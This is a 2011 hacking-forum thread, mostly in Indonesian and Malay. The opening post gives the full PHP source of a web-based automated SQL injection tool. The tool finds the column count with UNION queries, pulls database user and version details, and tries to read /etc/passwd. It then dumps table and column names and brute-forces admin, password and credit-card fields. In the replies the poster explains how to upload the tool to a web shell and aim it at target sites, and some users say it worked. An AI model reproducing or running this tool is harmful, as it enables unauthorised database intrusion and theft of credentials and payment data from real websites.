Page 1 of 1

[PHP] SQL Injector Web Based

PostPosted: Tue Oct 25, 2011 11:15 pm
by shad.hckr
[PHP] SQL Injector Web Based

Originally coded by : [email protected]
Modified by : Xblack

Image

Source code : http://xblack.biz/code.php?id=19

Code: Select all
<html>
<head><title>SQL Injector - Web Version</title>
<style type="text/css">
body{
    background-color: #000;
    font-family: courier new;
    font-size:11px;
    color:#FFFFFF;
}
input,textarea{
    font-family: courier new;
    font-size:11px;
    color:#FFFFFF;
    background-color: #999999;
    border:1px solid #000000;
}
#form {
    text-align:center;
    background-color:#222;
    padding:5px;
}
#error {
    text-align:center;
    background-color:#cc0000;
    padding:5px;
}
</style>
</head>
<body>

<h3>SQL Injector - Web Version - Darkc0de - Xblack</h3>
<form action="" method="POST">
<div id="form">Url : <input type="text" name="url" size="70"> End : <input type="text" name="end" size="3"><br>
<input type="submit" value="inject"><br><br>
Created by : darkc0de | Modified into web version by <a href="http://xblack.biz">Xblack</a> &copy; 2011</div>
</form>
<pre><?php
set_time_limit(0);
if(isset($_POST['url'])) {
    if(empty($_POST['end'])) {
        $end = "--";
    } else {
        $end = $_POST['end'];
    }   
    injector($_POST['url'],$end);
}

function injector($url,$end) {
        if(!preg_match("/darkc0de/", $url)) {
            print "<div id='error'>[?] Example: http://site.com/index.php?id=darkc0de&pg=news</div>\n";
        } else {
       
        switch($end) {
            case '--' :
            $end = '--';
            break;
            case '/*' :
            $end = '/*';
            break;
            default:
            $end = '--';
            break;
        }
       
        print "[-] URL : $url\n";
        print "[%] Trying connect to host...\n";
        if(con_host($url))
        {
            print "[+] Connect to host successful\n";
            print Get_Info($url);
            print "[-] Finding column number...\n";
            print "[-] Testing : ";
            inject_get_column_num($url, $end);
           
        } else {
            print "[!] Connect to host failed\n";
        }}
}
function inject_get_column_num($url, $end) {

    $max = 100;
    $stop = 0;
   
    $rurl = $url;
   
    for($i = 0; $i <= $max; $i++) {
    $word .= "concat(0x6461726B63306465,0x3a,".str_repeat($i,1).",0x3a),";
    $sql = str_replace("darkc0de", "1+AND+1=2+UNION+ALL+SELECT+".rtrim($word,",")."+$ending", $url);
    print "$i,";
    if(preg_match("/darkc0de:([0-9]+):/i", con_host($sql), $val)) {
        print "\n[+] Found column number: ".$i."\n";
        print "[+] Null Number: ".$val[1]."\n";
        save_log('injector.txt', "[-] Found column number: ".$i."\r\n");
        save_log('injector.txt', "[-] Null Number: ".$val[1]."\r\n");
       
        for($a = 0; $a <= $i; $a++) {
        $col .= "$a,";
         if($a == $val[1]) {
             $col = str_replace($val[1], "darkc0de", $col);
         }
        }
        $real = str_replace("darkc0de", "1+AND+1=2+UNION+ALL+SELECT+".rtrim($col,",")."+$ending", $rurl);
        print "[+] URL: ".$real."\n";
        save_log('injector.txt', "[+] URL: ".$real."\r\n");
        sql_info($real);
    }
  }
}
function sql_info($url) {
   
    $table_4 = array(
    'tbladmins','sort','_wfspro_admin','4images_users','a_admin','account','accounts','adm','admin','admin_login','admin_user','admin_userinfo','administer','administrable','administrate','administration','administrator','administrators','adminrights','admins','adminuser','art','article_admin','articles','artikel','密� ?','aut','author','autore','backend','backend_users','backenduser','bbs','book','chat_config','chat_messages','chat_users','client','clients','clubconfig','company','config','contact','contacts','content','control','cpg_config','cpg132_users','customer','customers','customers_basket','dbadmins','dealer','dealers','diary','download','Dragon_users','e107.e107_user','e107_user','forum.ibf_members','fusion_user_groups','fusion_users','group','groups','ibf_admin_sessions','ibf_conf_settings','ibf_members','ibf_members_converge','ibf_sessions','icq','images','index','info','ipb.ibf_members','ipb_sessions','joomla_users','jos_blastchatc_users','jos_comprofiler_members','jos_contact_details','jos_joomblog_users','jos_messages_cfg','jos_moschat_users','jos_users','knews_lostpass','korisnici','kpro_adminlogs','kpro_user','links','login','login_admin','login_admins','login_user','login_users','logins','logon','logs','lost_pass','lost_passwords','lostpass','lostpasswords','m_admin','main','mambo_session','mambo_users','manage','manager','mb_users','member','memberlist','members','minibbtable_users','mitglieder','movie','movies','mybb_users','mysql','mysql.user','name','names','news','news_lostpass','newsletter','nuke_authors','nuke_bbconfig','nuke_config','nuke_popsettings','nuke_users','用户','obb_profiles','order','orders','parol','partner','partners','passes','password','passwords','perdorues','perdoruesit','phorum_session','phorum_user','phorum_users','phpads_clients','phpads_config','phpbb_users','phpBB2.forum_users','phpBB2.phpbb_users','phpmyadmin.pma_table_info','pma_table_info','poll_user','punbb_users','pwd','pwds','reg_user','reg_users','registered','reguser','regusers','session','sessions','settings','shop.cards','shop.orders','site_login','site_logins','sitelogin','sitelogins','sites','smallnuke_members','smf_members','SS_orders','statistics','superuser','sysadmin','sysadmins','system','sysuser','sysusers','table','tables','tb_admin','tb_administrator','tb_login','tb_member','tb_members','tb_user','tb_username','tb_usernames','tb_users','tbl','tbl_user','tbl_users','tbluser','tbl_clients','tbl_client','tblclients','tblclient','test','usebb_members','user','user_admin','user_info','user_list','user_login','user_logins','user_names','usercontrol','userinfo','userlist','userlogins','username','usernames','userrights','users','vb_user','vbulletin_session','vbulletin_user','voodoo_members','webadmin','webadmins','webmaster','webmasters','webuser','webusers','x_admin','xar_roles','xoops_bannerclient','xoops_users','yabb_settings','yabbse_settings','ACT_INFO','ActiveDataFeed','Category','CategoryGroup','ChicksPass','ClickTrack','Country','CountryCodes1','CustomNav','DataFeedPerformance1','DataFeedPerformance2','DataFeedPerformance2_incoming','DataFeedShowtag1','DataFeedShowtag2','DataFeedShowtag2_incoming','dtproperties','Event','Event_backup','Event_Category','EventRedirect','Events_new','Genre','JamPass','MyTicketek','MyTicketekArchive','News','PerfPassword','PerfPasswordAllSelected','Promotion','ProxyDataFeedPerformance','ProxyDataFeedShowtag','ProxyPriceInfo','Region','SearchOptions','Series','Sheldonshows','StateList','States','SubCategory','Subjects','Survey','SurveyAnswer','SurveyAnswerOpen','SurveyQuestion','SurveyRespondent','sysconstraints','syssegments','tblRestrictedPasswords','tblRestrictedShows','TimeDiff','Titles','ToPacmail1','ToPacmail2','UserPreferences','uvw_Category','uvw_Pref','uvw_Preferences','Venue','venues','VenuesNew','X_3945','tblArtistCategory','tblArtists','tblConfigs','tblLayouts','tblLogBookAuthor','tblLogBookEntry','tblLogBookImages','tblLogBookImport','tblLogBookUser','tblMails','tblNewCategory','tblNews','tblOrders','tblStoneCategory','tblStones','tblUser','tblWishList','VIEW1','viewLogBookEntry','viewStoneArtist','vwListAllAvailable','CC_info','CC_username','cms_user','cms_users','cms_admin','cms_admins','user_name','jos_user','table_user','email','mail','bulletin','cc_info','login_name','admuserinfo','userlistuser_list','SiteLogin','Site_Login','UserAdmin','Admins','Login','Logins'
    );
   
    $column_4 = array(
'user','username','password','passwd','pass','cc_number','id','email','emri','fjalekalimi','pwd','user_name','customers_email_address','customers_password','user_password','name','user_pass','admin_user','admin_password','admin_pass','usern','user_n','users','login','logins','login_user','login_admin','login_username','user_username','user_login','auid','apwd','adminid','admin_id','adminuser','adminuserid','admin_userid','adminusername','admin_username','adminname','admin_name','usr','usr_n','usrname','usr_name','usrpass','usr_pass','usrnam','nc','uid','userid','user_id','myusername','mail','emni','logohu','punonjes','kpro_user','wp_users','emniplote','perdoruesi','perdorimi','punetoret','logini','llogaria','fjalekalimin','kodi','emer','ime','korisnik','korisnici','user1','administrator','administrator_name','mem_login','login_password','login_pass','login_passwd','login_pwd','sifra','lozinka','psw','pass1word','pass_word','passw','pass_w','user_passwd','userpass','userpassword','userpwd','user_pwd','useradmin','user_admin','mypassword','passwrd','admin_pwd','admin_passwd','mem_password','memlogin','e_mail','usrn','u_name','uname','mempassword','mem_pass','mem_passwd','mem_pwd','p_word','pword','p_assword','myname','my_username','my_name','my_password','my_email','cvvnumber','about','access','accnt','accnts','account','accounts','admin','adminemail','adminlogin','adminmail','admins','aid','aim','auth','authenticate','authentication','blog','cc_expires','cc_owner','cc_type','cfg','cid','clientname','clientpassword','clientusername','conf','config','contact','converge_pass_hash','converge_pass_salt','crack','customer','customers','cvvnumber]','data','db_database_name','db_hostname','db_password','db_username','download','e-mail','emailaddress','full','gid','group','group_name','hash','hashsalt','homepage','icq','icq_number','id_group','id_member','images','index','ip_address','last_ip','last_login','lastname','log','login_name','login_pw','loginkey','loginout','logo','md5hash','member','member_id','member_login_key','member_name','memberid','membername','members','new','news','nick','number','nummer','pass_hash','passwordsalt','passwort','personal_key','phone','privacy','pw','pwrd','salt','search','secretanswer','secretquestion','serial','session_member_id','session_member_login_key','sesskey','setting','sid','spacer','status','store','store1','store2','store3','store4','table_prefix','temp_pass','temp_password','temppass','temppasword','text','un','user_email','user_icq','user_ip','user_level','user_passw','user_pw','user_pword','user_pwrd','user_un','user_uname','user_usernm','user_usernun','user_usrnm','userip','userlogin','usernm','userpw','usr2','usrnm','usrs','warez','xar_name','xar_pass'
);
   
    print "[-] Getting sql server information...\n";
    $info = array(
    'User' => 'user()',
    'Database' => 'database()',
    'Version' => 'version()'
    );
   
    $rurl = $url;
    $rurl2 = $url;
    $rurl3 = $url;
   
    $ending = '--';
   
    foreach($info as $get => $val) {
        if(preg_match("/darkc0de:(.*?):darkc0de/", con_host("".str_replace("darkc0de", "".$string."+concat(0x6461726B63306465,0x3a,$val,0x3a,0x6461726B63306465)+", $url).""), $value)) {
            print "[-] $get: $value[1]\n";
            save_log('injector.txt', "[-] $get: $value[1]\r\n");
        }}
        print "[-] Testing load file...\n";
    $load = str_replace("darkc0de", "".$string."load_file(0x2f6574632f706173737764)", $rurl);
    if(preg_match("/root:x:/", con_host($load))) {
        print "[-] w00t w00t, you have permission to load file!\n";
        print "[-] URL: $load\n";
        save_log('injector.txt', "[-] w00t w00t, you have permission to load file!\r\n");
        save_log('injector.txt', "[-] URL: $load\r\n");
    } else {
        print "[-] No permission to load file :( \n";
    }
            if(preg_match("/darkc0de:5.(.*?):darkc0de/", con_host("".str_replace("darkc0de", "concat(0x6461726B63306465,0x3a,version(),0x3a,0x6461726B63306465)", $url).""), $value)) {
                print "[-] MySQL Server version is : 5.x\n";
                print "[-] Start extract the column and table...\n";
                print "[-] Table : Column\n";
                $url = str_replace("darkc0de", "concat(char(88,98,108,97,99,107,58),count(table_name),char(58,88,98,108,97,99,107))", $url);
                //$url = str_replace($ending, "+from+information_schema.tables+where+table_schema=database()+$ending", $url);
                $url = "$url+from+information_schema.tables+where+table_schema=database()$ending";
                if(preg_match("/Xblack:([0-9]+):Xblack/", con_host($url), $totaltbl)) {
                   print "[+] Total Table Found: ".$totaltbl[1]."\n";
                   save_log('injector.txt', "[+] Total Table Found: ".$totaltbl[1]."\r\n");
                   for($i = 0; $i <= $totaltbl[1]; $i++) {
                  $urlxx = str_replace("darkc0de","concat(char(88,98,108,97,99,107,58),table_name,char(58,88,98,108,97,99,107))",$rurl2);
                  $urlxx = $urlxx."from+information_schema.tables+where+table_schema=database()+limit+".$i.",1+$ending";
                  if(preg_match("/Xblack:(.*?):Xblack/", con_host($urlxx), $table_name)) {
                      print "[-] Table: ".$table_name[1]."\n";
                      save_log('injector.txt', "[-] Table: ".$table_name[1]."\r\n");
                    $urlxxx = str_replace("darkc0de","concat(char(88,98,108,97,99,107,58),count(column_name),char(58,88,98,108,97,99,107))",$rurl2);
                    $urlxxx = $urlxxx."from+information_schema.columns+where+table_name=0x".HexValue($table_name[1])."+$ending";
                      if(preg_match("/Xblack:(.*?):Xblack/", con_host($urlxxx), $totalclm)) {
                          print "[+] Total Column in ".$table_name[1].": ".$totalclm[1]."\n";
                          save_log('injector.txt', "[+] Total Column in ".$table_name[1].": ".$totalclm[1]."\r\n");
                          for($a = 0; $a <= $totalclm[1]; $a++) {
                            $urlxxxx = str_replace("darkc0de","concat(char(88,98,108,97,99,107,58),column_name,char(58,88,98,108,97,99,107))",$rurl3);
                            $urlxxxx = $urlxxxx."from+information_schema.columns+where+table_name=0x".HexValue($table_name[1])."+limit+".$a.",1+$ending";
                              if(preg_match("/Xblack:(.*?):Xblack/", con_host($urlxxxx), $column_name)) {
                                  print "".$column_name[1].",";
                                  save_log('injector.txt', "".$column_name[1].",");
                             }
                          }
                          print "\n";
                          save_log('injector.txt', "\r\n");
                      }
                  }
                   }
                   
                }

            } else {
                print "[-] MySQL Server version is : 4.x\n";
                print "[-] Start automatic column and table finder...\n";
                print "[-] This may take a few minutes or hours to finish\n";
                foreach($table_4 as $table) {
                    $i++;
                    $url = str_replace("concat(0x696E6A336374)", "concat(0x6461726B63306465)", $rurl);
                    $url = str_replace($ending, "+from+".$table."+$ending", $url);
                    if(preg_match("/darkc0de/", con_host($url))) {
                        print "[$i] Found Table : $table\n";
                        save_log('injector.txt', "[-] Found Table : $table\r\n");
                        print "[-] Finding column...\n";
                         foreach($column_4 as $column) {
                             $url = str_replace("darkc0de", "concat(0x6461726B63306465,0x3a,$column,0x3a,0x6461726B63306465)", $rurl);
                            $url = str_replace("$ending", "+from+".$table."+$ending", $url);
                            if(preg_match("/darkc0de:(.*?):darkc0de/", con_host($url))) {
                                print "[-] Found column: $column\n";
                                save_log('injector.txt', "[-] Found column: $column\r\n");
                            }
                         }
                         save_log('injector.txt', "\r\n");
                         print "[-] Done searching column inside $table table\n";
                       
                    }
                }
            }
    print "[-] Done\n";
    print "[-] See 'injector.txt' to see the log\n";
    exit;
}
function HexValue($text) {
     for($i = 0; $i < strlen($text); $i++) {
         $a .= dechex(ord($text[$i]));
     }
     return $a;
}
function Get_Info($site) {
    if($info = con_host($site)) {
        preg_match("/Content-Type:(.+)/", $info, $type);
        preg_match("/Server:(.+)/", $info, $server);
        print "[-] $type[0]\n";
        print "[-] $server[0]\n";
        $ip = parse_url($site);
        print "[-] IP: ".gethostbyname($ip['host'])."\n";
    }
}
function con_host($host) {
    $ch = curl_init($host);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 200);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_COOKIEFILE, "google_cookies.txt");
    curl_setopt($ch, CURLOPT_COOKIEJAR, "google_cookies.txt");
    curl_setopt($ch, CURLOPT_REFERER, "http://google.com");
    curl_setopt($ch, CURLOPT_USERAGENT, 'Opera/9.80 (J2ME/MIDP; Opera Mini/9.80 (S60; SymbOS; Opera Mobi/23.348; U; en) Presto/2.5.25 Version/10.54');
   
    $pg = curl_exec($ch);
    if($pg){
        return $pg;
    } else {
        return false;
    }
}
function save_log($fname = '', $text = '') {
    $file = @fopen(dirname(__FILE__).'/'.$fname.'', 'a');
    $write = @fwrite($file, $text, '60000000');
    if($write) {
        return 1;
    } else {
        return 0;
    }
}?>
</body>
<html>

Re: [PHP] SQL Injector Web Based

PostPosted: Wed Oct 26, 2011 12:23 am
by NoThee
om mau tanya cara pake kodenya ntu di apain y ane bingung sering ng'liat code2 php kya gt tp gk tau hrs di apain...?
tolong y jawabannya...sorry newbie

Re: [PHP] SQL Injector Web Based

PostPosted: Wed Oct 26, 2011 12:39 am
by shad.hckr
1. save code diatas make extensi php (ex : sqli.php )
2. upload ke web/shell
3. buka di browser.
4. masukin link yang mau di inject ( ex : http://domain.com/file.php?var=darkc0de )

Re: [PHP] SQL Injector Web Based

PostPosted: Wed Oct 26, 2011 12:49 am
by NoThee
upload ke web/shell gmn caranya...?

Re: [PHP] SQL Injector Web Based

PostPosted: Wed Oct 26, 2011 5:07 am
by shad.hckr
NoThee wrote:upload ke web/shell gmn caranya...?

cari di thread yang laen ada banyak tutorialnya.

Re: [PHP] SQL Injector Web Based

PostPosted: Wed Oct 26, 2011 5:20 am
by poni
keren pak shad

Re: [PHP] SQL Injector Web Based

PostPosted: Wed Oct 26, 2011 7:29 am
by Digital Cat
Top Markotop..

ijin Copy Code nya ya..

:Dkalo ada yg udah upload ..

bagi linknya yach..

lagi PW ki PW - Posisi wenak.

Re: [PHP] SQL Injector Web Based

PostPosted: Fri Nov 11, 2011 1:38 am
by yuanryuzaki
udah ane coba mase,,, dan berhasil di upload ke web :D

Re: [PHP] SQL Injector Web Based

PostPosted: Mon Jan 02, 2012 11:06 pm
by oramelu2
bs dijalanin dan sukses sebagaimana mestinya gan?

Re: [PHP] SQL Injector Web Based

PostPosted: Thu Jan 05, 2012 8:15 am
by googlegirl
maaf abang2 semua..saya bru dlm nie...gimana nk guna sql ini dan dimana gwa maw d.load sql injection??